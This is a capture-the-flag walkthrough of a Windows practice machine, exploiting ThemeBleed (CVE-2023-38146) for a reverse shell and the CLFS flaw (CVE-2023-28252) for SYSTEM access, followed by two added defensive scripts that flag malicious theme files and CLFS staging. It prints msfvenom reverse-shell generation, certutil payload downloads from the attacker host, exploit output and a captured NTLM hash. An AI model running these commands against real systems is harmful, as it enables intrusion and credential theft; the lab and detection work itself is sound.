Aero

Skills

  • CVE-2023-38146 Exploitation (ThemeBleed - Windows 11 Themes Vulnerability)
  • CVE-2023-28252 Exploitation (CLFS - Common Log File System Vulnerability)

Certifications

  • OSCP
  • eJPT

Description

Aero is a medium-difficulty Windows machine that features two recent CVEs: CVE-2023-38146, which affects Windows 11 themes, and CVE-2023-28252, which targets the Common Log File System (CLFS). Initial access is obtained by building a malicious payload with the ThemeBleed proof-of-concept, which results in a reverse shell. Once on the box, a CVE disclosure notice is found in the user's directory indicating that the host is vulnerable to CVE-2023-28252. An existing proof-of-concept must be modified to escalate privileges to the administrator level or to run code as NT Authority\SYSTEM.


Reconnaissance

We check that the machine is up and determine its operating system: the TTL of Windows machines is usually 128, and in this case there is an intermediate node that decrements the TTL by one.

# ping -c 3 10.129.229.128
PING 10.129.229.128 (10.129.229.128) 56(84) bytes of data.
64 bytes from 10.129.229.128: icmp_seq=1 ttl=127 time=73.2 ms
64 bytes from 10.129.229.128: icmp_seq=2 ttl=127 time=37.8 ms
64 bytes from 10.129.229.128: icmp_seq=3 ttl=127 time=37.3 ms

--- 10.129.229.128 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 37.301/49.452/73.222/16.809 ms

Nmap

We run a scan of all open TCP ports with nmap.

# sudo nmap -p- --open --min-rate 5000 -sS -Pn -n -v 10.129.229.128 -oG openPorts
[sudo] password for justice-reaper: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-01 08:54 CEST
Initiating SYN Stealth Scan at 08:54
Scanning 10.129.229.128 [65535 ports]
Discovered open port 80/tcp on 10.129.229.128
Completed SYN Stealth Scan at 08:54, 26.37s elapsed (65535 total ports)
Nmap scan report for 10.129.229.128
Host is up (0.037s latency).
Not shown: 65534 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
80/tcp open  http

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.45 seconds
           Raw packets sent: 131089 (5.768MB) | Rcvd: 21 (924B)

Next we run service detection and version identification against the open ports that were found.

# nmap -sCV -p 80 10.129.229.128 -oN services
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-01 08:55 CEST
Nmap scan report for 10.129.229.128
Host is up (0.069s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Aero Theme Hub
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.38 seconds

Web Enumeration

We can upload files. Since the site is about Windows 11 themes, I have seen that the extensions for these themes are .theme and .themepack.

Web Exploitation

I found this exploit, https://github.com/Jnnshschl/CVE-2023-38146, which exploits the ThemeBleed vulnerability in Windows 11 themes. The first thing to do is start a netcat listener.

# rlwrap -cAr nc -lvnp 4711

We run the exploit.

# python3 themebleed.py -r 10.10.16.29 -p 4711 
2024-10-01 10:22:20,270 INFO> ThemeBleed CVE-2023-38146 PoC [https://github.com/Jnnshschl]
2024-10-01 10:22:20,270 INFO> Credits to -> https://github.com/gabe-k/themebleed, impacket and cabarchive

2024-10-01 10:22:21,047 INFO> Compiled DLL: "./tb/Aero.msstyles_vrf_evil.dll"
2024-10-01 10:22:21,047 INFO> Theme generated: "evil_theme.theme"
2024-10-01 10:22:21,048 INFO> Themepack generated: "evil_theme.themepack"

2024-10-01 10:22:21,048 INFO> Remember to start netcat: rlwrap -cAr nc -lvnp 4711
2024-10-01 10:22:21,048 INFO> Starting SMB server: 10.10.16.29:445

2024-10-01 10:22:21,048 INFO> Config file parsed
2024-10-01 10:22:21,048 INFO> Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
2024-10-01 10:22:21,048 INFO> Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
2024-10-01 10:22:21,049 INFO> Config file parsed
2024-10-01 10:22:21,049 INFO> Config file parsed
2024-10-01 10:22:59,367 INFO> Incoming connection (10.129.229.128,57006)
2024-10-01 10:22:59,617 INFO> AUTHENTICATE_MESSAGE (AERO\sam.emerson,AERO)
2024-10-01 10:22:59,617 INFO> User AERO\sam.emerson authenticated successfully
2024-10-01 10:22:59,617 INFO> sam.emerson::AERO:aaaaaaaaaaaaaaaa:16fda741160bfff54304c03307ae3134:01010000000000008033cf1fdb13db012816647210fb94bb00000000010010007600530056004a005a00510046004600030010007600530056004a005a005100460046000200100043004c004a004600520058006b0074000400100043004c004a004600520058006b007400070008008033cf1fdb13db010600040002000000080030003000000000000000000000000020000008fe7cd3353de385d22afb19eac8fd7e7699d463ad1f6ac47a0cc5666c5d4bb70a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00320039000000000000000000
2024-10-01 10:22:59,655 INFO> Connecting Share(1:IPC$)
2024-10-01 10:22:59,731 INFO> Connecting Share(2:tb)
2024-10-01 10:22:59,770 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 1]
2024-10-01 10:23:00,149 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 1]
2024-10-01 10:23:00,504 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 7]
2024-10-01 10:23:00,656 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 5]
2024-10-01 10:23:01,497 WARNING> Stage 2/3: "Aero.msstyles_vrf.dll" [shareAccess: 7]
2024-10-01 10:23:01,657 WARNING> Stage 2/3: "Aero.msstyles_vrf.dll" [shareAccess: 1]
2024-10-01 10:23:03,245 WARNING> Stage 2/3: "Aero.msstyles_vrf.dll" [shareAccess: 7]
2024-10-01 10:23:03,396 WARNING> Stage 3/3: "Aero.msstyles_vrf.dll" [shareAccess: 5]
2024-10-01 10:23:10,341 INFO> Disconnecting Share(1:IPC$)
2024-10-01 10:23:36,073 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 1]

We gain access to the victim machine.

# rlwrap -cAr nc -lvnp 4711

listening on [any] 4711 ...
connect to [10.10.16.29] from (UNKNOWN) [10.129.229.128] 57007
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
aero\sam.emerson
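The ThemeBleed chain above works because the uploaded theme makes the victim fetch Aero.msstyles (and then the _vrf.dll) from the attacker's SMB share "tb". A theme hub that accepts .theme uploads can reject that shape before anyone applies the file: the .theme format is a plain INI file, so the check below parses it and flags any UNC path plus any [VisualStyles] Path that is not a local system style. This is an added example written for this writeup, not code from the original post or from the PoC repository; the two theme texts are constructed samples, ATTACKER_HOST is a placeholder, and the "only styles under the system Themes folder" rule is an assumed policy. A .themepack is a CAB wrapper around a .theme, so the same check would run after extraction.

```python
import configparser
import re

# Constructed sample: a benign Windows 11 theme that references the local Aero style.
BENIGN_THEME = r"""[Theme]
DisplayName=Aero Light

[VisualStyles]
Path=%SystemRoot%\resources\Themes\Aero\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""

# Constructed sample in the shape of a ThemeBleed theme: the visual style path
# points at an SMB share ("tb", as in the PoC output above); the host is a placeholder.
REMOTE_THEME = r"""[Theme]
DisplayName=Evil Theme

[VisualStyles]
Path=\\ATTACKER_HOST\tb\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""

UNC_RE = re.compile(r"^\\\\[^\\]+\\")            # \\host\share\...
# Assumption: the hub only accepts styles shipped under the system Themes folder.
ALLOWED_STYLE_ROOT = "%systemroot%\\resources\\themes\\"


def theme_findings(theme_text: str) -> list[str]:
    """Return the reasons a .theme file should be rejected (empty list = accept)."""
    parser = configparser.ConfigParser(interpolation=None, allow_no_value=True, strict=False)
    parser.read_string(theme_text)
    findings = []
    # Any value that is a UNC path makes Windows fetch that resource over SMB
    # when the theme is applied, leaking the NetNTLMv2 hash and loading remote code.
    for section in parser.sections():
        for key, value in parser.items(section):
            if value and UNC_RE.match(value.strip()):
                findings.append(f"[{section}] {key}: UNC path {value!r}")
    # The msstyles file itself must be a local system style, not an arbitrary file.
    if parser.has_section("VisualStyles"):
        path = (parser["VisualStyles"].get("path") or "").strip()
        if not path.lower().endswith(".msstyles"):
            findings.append(f"[VisualStyles] Path does not name an .msstyles file: {path!r}")
        if not path.lower().startswith(ALLOWED_STYLE_ROOT):
            findings.append(f"[VisualStyles] Path outside the system Themes folder: {path!r}")
    return findings


if __name__ == "__main__":
    for name, text in (("benign", BENIGN_THEME), ("remote", REMOTE_THEME)):
        print(name, "->", theme_findings(text) or "accepted")
```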

Privilege Escalation

In our user's Documents folder we see a PDF.

PS C:\Users\sam.emerson\Documents> dir
dir


    Directory: C:\Users\sam.emerson\Documents


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----
-a----         9/21/2023   9:18 AM          14158 CVE-2023-28252_Summary.pdf

To transfer the PDF we set up an SMB server on our machine.

# impacket-smbserver smbFolder $(pwd) -smb2support

We copy the PDF file over to our machine.

PS C:\Users\sam.emerson\Documents> copy CVE-2023-28252_Summary.pdf \\10.10.16.29\smbFolder\CVE-2023-28252_Summary.pdf

We view the contents of the PDF, which describes CVE-2023-28252.

# pdf2txt CVE-2023-28252_Summary.pdf 
CVE-2023-28252 Summary:
Vulnerability Type: Privilege Escalation
Target Component: Common Log File System (CLFS)
Risk Level: Critical
Exploitation Date: February 2022 onwards
Patch Released by Microsoft: April 2023

Background:
The Nokoyawa ransomware group has been active since February 2022, and it was only 
in April 2023 that Microsoft released a patch to address this issue. This 
vulnerability has been used as a means for attackers to gain unauthorized access to
Windows systems, making it imperative for us to apply the necessary patch to 
safeguard our infrastructure.
According to Kaspersky’s analysis, the Nokoyawa ransomware group has used other 
exploits targeting the CLFS driver since June 2022, with similar but distinct 
characteristics, all linked to a single exploit developer.

Actions Required:
Immediate Patching: We strongly recommend applying the security patch released by 
Microsoft for CVE-2023-28252 as soon as possible to mitigate the risk associated 
with this vulnerability. Failing to do so could leave our servers exposed to 
potential exploitation.

Review and Monitoring: In addition to patching, we should conduct a thorough review
of our server logs to check for any signs of suspicious activity or unauthorized 
access. Continuous monitoring of our server environment is crucial to ensure the 
security of our systems.

Security Awareness: It is essential to remind all team members of the importance of
practicing good cybersecurity hygiene. Encourage the use of strong, unique 
passwords and two-factor authentication wherever applicable.

Incident Response Plan: Ensure that our incident response plan is up-to-date and 
ready for immediate activation in case of any security incidents. Timely detection 
and response are critical in mitigating the impact of potential attacks.

We download the exploit from this GitHub project, https://github.com/duck-sec/CVE-2023-28252-Compiled-exe.git, and start a Python HTTP server on our machine.

# python -m http.server 80    

We transfer the exploit to the victim machine.

PS C:\Users\sam.emerson\Documents> certutil.exe -urlcache -split -f http://10.10.16.29/exploit.exe

We create a shell.exe binary that sends a reverse shell back to our machine.

# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.29 LPORT=443 -f exe > shell.exe

We transfer the shell.exe file to the victim machine.

PS C:\Users\sam.emerson\Documents> certutil.exe -urlcache -split -f http://10.10.16.29/shell.exe

We start listening with netcat.

# rlwrap nc -nlvp 443 

We run the exploit. The first attempt fails because the binary expects three arguments (token offset, flag, program to execute); the second attempt supplies the flag.

PS C:\Users\sam.emerson\Documents> .\exploit.exe 1208 "C:\Users\sam.emerson\Documents\Shell.exe"
.\exploit.exe 1208 "C:\Users\sam.emerson\Documents\Shell.exe"
Executing command: (null)
[+] Incorrect number of arguments!
[+] Usage: exploit.exe <Token Offset> <Flag> <Program to execute>
[+] Example: exploit.exe 1208 1 calc.exe>
PS C:\Users\sam.emerson\Documents> .\exploit.exe 1208 1 "C:\Users\sam.emerson\Documents\Shell.exe"
.\exploit.exe 1208 1 "C:\Users\sam.emerson\Documents\Shell.exe"
Executing command: C:\Users\sam.emerson\Documents\Shell.exe


ARGUMENTS
[+] TOKEN OFFSET 4b8
[+] FLAG 1


VIRTUAL ADDRESSES AND OFFSETS
[+] NtFsControlFile Address --> 00007FFCCDD84240
[+] pool NpAt VirtualAddress -->FFFFD380743FF000
[+] MY EPROCESSS FFFFBE0BB60BE1C0
[+] SYSTEM EPROCESSS FFFFBE0BB36FF040
[+] _ETHREAD ADDRESS FFFFBE0BB6896080
[+] PREVIOUS MODE ADDRESS FFFFBE0BB68962B2
[+] Offset ClfsEarlierLsn --------------------------> 0000000000013220
[+] Offset ClfsMgmtDeregisterManagedClient --------------------------> 000000000002BFB0
[+] Kernel ClfsEarlierLsn --------------------------> FFFFF80452C13220
[+] Kernel ClfsMgmtDeregisterManagedClient --------------------------> FFFFF80452C2BFB0
[+] Offset RtlClearBit --------------------------> 0000000000343010
[+] Offset PoFxProcessorNotification --------------------------> 00000000003DBD00
[+] Offset SeSetAccessStateGenericMapping --------------------------> 00000000009C87B0
[+] Kernel RtlClearBit --------------------------> FFFFF80450143010
[+] Kernel SeSetAccessStateGenericMapping --------------------------> FFFFF804507C87B0

[+] Kernel PoFxProcessorNotification --------------------------> FFFFF804501DBD00


PATHS
[+] Folder Public Path = C:\Users\Public
[+] Base log file name path= LOG:C:\Users\Public\71
[+] Base file path = C:\Users\Public\71.blf
[+] Container file name path = C:\Users\Public\.p_71
Last kernel CLFS address = FFFFD3806EF69000
numero de tags CLFS founded 9

Last kernel CLFS address = FFFFD38077AAF000
numero de tags CLFS founded 1

[+] Log file handle: 00000000000000EC
[+] Pool CLFS kernel address: FFFFD38077AAF000

number of pipes created =5000

number of pipes created =4000
TRIGGER START
System_token_value: 4141414141414141
TRYING AGAIN
TRIGGER START
System_token_value: 4141414141414141
TRYING AGAIN
TRIGGER START
System_token_value: FFFFD3806A44159B
SYSTEM TOKEN CAPTURED
Closing Handle
ACTUAL USER=SYSTEM

We gain access as nt authority\system.

# rlwrap nc -nlvp 443  
listening on [any] 443 ...
connect to [10.10.16.29] from (UNKNOWN) [10.129.229.128] 57072
Microsoft Windows [Version 10.0.22000.1761]
(c) Microsoft Corporation. All rights reserved.

C:\Users\sam.emerson\Documents>whoami
whoami
nt authority\system
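The PATHS section of the exploit output shows the CLFS artefacts the privilege escalation has to stage on disk: a base log file (71.blf) and its container (.p_71) in C:\Users\Public. The PDF in Documents asks for log review; the function below is the kind of rule that review could apply to file-creation telemetry (for instance Sysmon Event ID 11): CLFS log artefacts created inside user-writable directories are flagged. This is an added example written for this writeup, not code from the original post or from the exploit repository; the events are constructed samples, and the set of user-writable directories is an assumption to be tuned per environment.

```python
import re
from dataclasses import dataclass


@dataclass
class FileCreateEvent:
    """One file-creation event, e.g. Sysmon Event ID 11 with the fields simplified."""
    user: str
    image: str   # process that created the file
    path: str    # file that was created


# CLFS base log files (.blf) and their container files (.p_<name>), as in the PoC output.
BLF_RE = re.compile(r"\.blf$", re.I)
CONTAINER_RE = re.compile(r"\\\.p_[^\\]+$", re.I)   # e.g. ...\Public\.p_71
# Assumption: directories an unprivileged user can write to; tune per environment.
USER_WRITABLE = ("c:\\users\\", "c:\\windows\\temp\\", "c:\\programdata\\")


def clfs_alert_reason(ev: FileCreateEvent):
    """Return why the event looks like CLFS exploit staging, or None if it looks benign."""
    path = ev.path.lower()
    if not (BLF_RE.search(path) or CONTAINER_RE.search(path)):
        return None
    if not path.startswith(USER_WRITABLE):
        return None   # OS-managed CLFS logs (e.g. under System32\config) live elsewhere
    return f"CLFS log artefact {ev.path} created in a user-writable directory by {ev.image} ({ev.user})"


def alerts(events):
    """Run the rule over a batch of events and keep only the hits."""
    return [r for r in (clfs_alert_reason(e) for e in events) if r]


# Constructed sample events modelled on the PATHS section of the exploit output.
SAMPLE_EVENTS = [
    FileCreateEvent("AERO\\sam.emerson", r"C:\Users\sam.emerson\Documents\exploit.exe", r"C:\Users\Public\71.blf"),
    FileCreateEvent("AERO\\sam.emerson", r"C:\Users\sam.emerson\Documents\exploit.exe", r"C:\Users\Public\.p_71"),
    FileCreateEvent("NT AUTHORITY\\SYSTEM", r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\config\TxR\sample.TxR.blf"),
    FileCreateEvent("AERO\\sam.emerson", r"C:\Windows\System32\notepad.exe", r"C:\Users\sam.emerson\Documents\notes.txt"),
]


if __name__ == "__main__":
    for reason in alerts(SAMPLE_EVENTS):
        print("ALERT:", reason)
```

The "number of pipes created" lines in the same output point at a second signal, a burst of named-pipe creations from one user process, that this rule does not cover.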

This post is licensed under CC BY 4.0 by the author.